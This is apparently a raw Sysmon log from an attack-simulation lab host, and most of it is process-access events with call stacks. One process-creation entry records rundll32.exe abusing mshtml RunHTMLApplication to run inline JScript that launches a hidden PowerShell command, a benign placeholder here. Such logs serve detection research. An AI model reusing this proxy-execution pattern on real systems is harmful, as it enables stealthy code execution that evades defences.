15:59:39.647{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026887Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.647{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-536B-6008-6E06-00000000A301}7492C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000026886Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536B-6008-6E06-00000000A301}7492C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000026885Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.657{7901BC46-536B-6008-6E06-00000000A301}7492C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXE"C:\Windows\System32\rundll32.exe" about:"\..\mshtml,RunHTMLApplication "%%3Chta:application%%3E%%3Cscript%%20language="JScript.Compact"%%3Ea=new%%20ActiveXObject("WScript.Shell");a.Run("powershell.exe%%20-nop%%20-Command%%20Write-Host%%20aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa;%%20Start-Sleep%%20-Seconds%%202;%%20exit",0,true);close();%%3C/script%%3EC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000026884Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536A-6008-6D06-00000000A301}6920C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026883Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536A-6008-6C06-00000000A301}4300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026882Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536A-6008-6B06-00000000A301}5244C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026881Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026880Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026879Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026878Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026877Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026876Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026875Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026874Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026873Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026872Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026871Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026870Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026869Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026868Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026867Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 